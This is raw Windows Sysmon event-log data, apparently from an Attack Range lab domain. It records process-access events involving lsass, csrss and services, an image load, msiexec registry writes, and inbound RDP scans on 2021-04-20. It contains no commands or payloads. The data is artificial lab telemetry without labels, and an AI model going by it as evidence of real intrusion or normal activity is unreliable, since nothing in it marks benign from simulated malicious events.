14:57:25.171{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EBD5-607E-B40C-00000000BB01}5324c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000074425Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:25.171{A7A01FEF-EB7F-607E-9D0B-00000000BB01}50764740c:\Windows\syswow64\MsiExec.exe{A7A01FEF-EBD5-607E-B40C-00000000BB01}5324c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+4f2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+122f(wow64)|C:\Windows\System32\msi.dll+a8e33(wow64)|C:\Windows\System32\msi.dll+180886(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000074424Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:24.921{A7A01FEF-B624-607E-0B00-00000000BB01}8605576C:\Windows\system32\lsass.exe{A7A01FEF-EBD4-607E-B20C-00000000BB01}4856c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074423Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:24.921{A7A01FEF-B624-607E-0B00-00000000BB01}8605576C:\Windows\system32\lsass.exe{A7A01FEF-EBD4-607E-B20C-00000000BB01}4856c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000074422Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:24.921{A7A01FEF-EBD4-607E-B20C-00000000BB01}4856C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeC:\Windows\SysWOW64\taskschd.dll10.0.14393.4169 (rs1_release.210107-1130)Task Scheduler COM APIMicrosoft® Windows® Operating SystemMicrosoft Corporationtaskschd.dllMD5=34A9F9DAEE26461B55530C53F503C379,SHA256=B1F1A125B0F8B0C314647BD0A9180FFEDC21EA2C4699B0DAC4F84BE26EDD9A05,IMPHASH=EBE95B59B3B2C846CFC2203F3084575CtrueMicrosoft WindowsValid 354300x800000000000000050264Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:23.357{85C0FFC9-B85C-607E-9700-00000000BB01}3076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-895.attackrange.local52523-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8089- 354300x800000000000000050263Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:22.590{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.234scanner.openportstats.com52858-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 10341000x800000000000000074525Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:26.827{A7A01FEF-B624-607E-0A00-00000000BB01}8524336C:\Windows\system32\services.exe{A7A01FEF-EBD6-607E-B70C-00000000BB01}2124C:\Windows\system32\sppsvc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\services.exe+1713f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074524Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:26.827{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-EBD6-607E-B70C-00000000BB01}2124C:\Windows\system32\sppsvc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074523Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:26.796{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EBD6-607E-B70C-00000000BB01}2124C:\Windows\system32\sppsvc.exe0x103800C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000074522Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:26.796{A7A01FEF-B624-607E-0A00-00000000BB01}8525304C:\Windows\system32\services.exe{A7A01FEF-EBD6-607E-B70C-00000000BB01}2124C:\Windows\system32\sppsvc.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+307d|C:\Windows\system32\services.exe+6334|C:\Windows\system32\services.exe+dc24|C:\Windows\system32\services.exe+d248|C:\Windows\system32\services.exe+4d0c|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074521Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:26.749{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B624-607E-0B00-00000000BB01}860C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074520Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:26.749{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B624-607E-0B00-00000000BB01}860C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074519Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:26.749{A7A01FEF-B624-607E-0B00-00000000BB01}8605576C:\Windows\system32\lsass.exe{A7A01FEF-B624-607E-0A00-00000000BB01}852C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 13241300x800000000000000074518Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:57:26.702{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-007E-0000-1000-0000000FF1CE}\URLUpdateInfo(Empty) 13241300x800000000000000074517Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PubSetValue2021-04-20 14:57:26.702{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-007E-0000-1000-0000000FF1CE}\PublisherMicrosoft Corporation 13241300x800000000000000074516Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:57:26.702{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-007E-0000-1000-0000000FF1CE}\InstallSourcec:\program files\microsoft office\root\integration\ 354300x800000000000000074515Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:25.101{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-27100-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000074514Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:24.575{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.85scanner.openportstats.com59454-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 10341000x800000000000000074513Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:26.624{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-DF97-607E-4709-00000000BB01}6584C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+d7a69|C:\Windows\System32\SHELL32.dll+d7a09|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF802548EC8C8)|UNKNOWN(FFFFF40710BB4A38)|UNKNOWN(FFFFF40710BAF6E5)|UNKNOWN(FFFFF40710BB0C0A)|UNKNOWN(FFFFF40710BAEEC6)|UNKNOWN(FFFFF80254603E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+58ac4|C:\Windows\System32\SHELL32.dll+58807|C:\Windows\System32\SHELL32.dll+554f5 10341000x800000000000000074512Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:26.624{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-DF97-607E-4709-00000000BB01}6584C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+d7a69|C:\Windows\System32\SHELL32.dll+d7a09|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF802548EC8C8)|UNKNOWN(FFFFF40710BB4A38)|UNKNOWN(FFFFF40710BAF6E5)|UNKNOWN(FFFFF40710BB0C0A)|UNKNOWN(FFFFF40710BAEEC6)|UNKNOWN(FFFFF80254603E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+58ac4|C:\Windows\System32\SHELL32.dll+58807|C:\Windows\System32\SHELL32.dll+554f5 10341000x800000000000000074511Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:26.624{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-DF97-607E-4709-00000000BB01}6584C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+d7a69|C:\Windows\System32\SHELL32.dll+d7a09|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF802548EC8C8)|UNKNOWN(FFFFF40710BB4A38)|UNKNOWN(FFFFF40710BAF6E5)|UNKNOWN(FFFFF40710BB0C0A)|UNKNOWN(FFFFF40710BAEEC6)|UNKNOWN(FFFFF80254603E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+58ac4|C:\Windows\System32\SHELL32.dll+58807|C:\Windows\System32\SHELL32.dll+554f5 10341000x800000000000000074510Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:26.624{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-DF97-607E-4709-00000000BB01}6584C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+56f8f|C:\Windows\System32\SHELL32.dll+58888|C:\Windows\System32\SHELL32.dll+554f5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+592ea|C:\Windows\System32\SHELL32.dll+dac5a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074509Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:26.624{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-DF97-607E-4709-00000000BB01}6584C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+56efa|C:\Windows\System32\SHELL32.dll+58888|C:\Windows\System32\SHELL32.dll+554f5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+592ea|C:\Windows\System32\SHELL32.dll+dac5a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074508Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:26.624{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-DF97-607E-4709-00000000BB01}6584C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+56ed6|C:\Windows\System32\SHELL32.dll+58888|C:\Windows\System32\SHELL32.dll+554f5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+592ea|C:\Windows\System32\SHELL32.dll+dac5a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074507Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:26.624{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-DF97-607E-4709-00000000BB01}6584C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+56ed6|C:\Windows\System32\SHELL32.dll+58888|C:\Windows\System32\SHELL32.dll+554f5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+592ea|C:\Windows\System32\SHELL32.dll+dac5a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074506Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:26.624{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-DF97-607E-4709-00000000BB01}6584C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+56f8f|C:\Windows\System32\SHELL32.dll+58888|C:\Windows\System32\SHELL32.dll+554f5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+592ea|C:\Windows\System32\SHELL32.dll+dac5a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074505Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:26.624{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-DF97-607E-4709-00000000BB01}6584C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+56efa|C:\Windows\System32\SHELL32.dll+58888|C:\Windows\System32\SHELL32.dll+554f5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+592ea|C:\Windows\System32\SHELL32.dll+dac5a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074504Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:26.624{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-DF97-607E-4709-00000000BB01}6584C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+56ed6|C:\Windows\System32\SHELL32.dll+58888|C:\Windows\System32\SHELL32.dll+554f5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+592ea|C:\Windows\System32\SHELL32.dll+dac5a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074503Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:26.624{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-DF97-607E-4709-00000000BB01}6584C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+56ed6|C:\Windows\System32\SHELL32.dll+58888|C:\Windows\System32\SHELL32.dll+554f5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+592ea|C:\Windows\System32\SHELL32.dll+dac5a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074502Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:26.624{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-DF97-607E-4709-00000000BB01}6584C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+5c6b3|C:\Windows\System32\SHELL32.dll+57217|C:\Windows\System32\SHELL32.dll+58888|C:\Windows\System32\SHELL32.dll+554f5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+592ea|C:\Windows\System32\SHELL32.dll+dac5a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 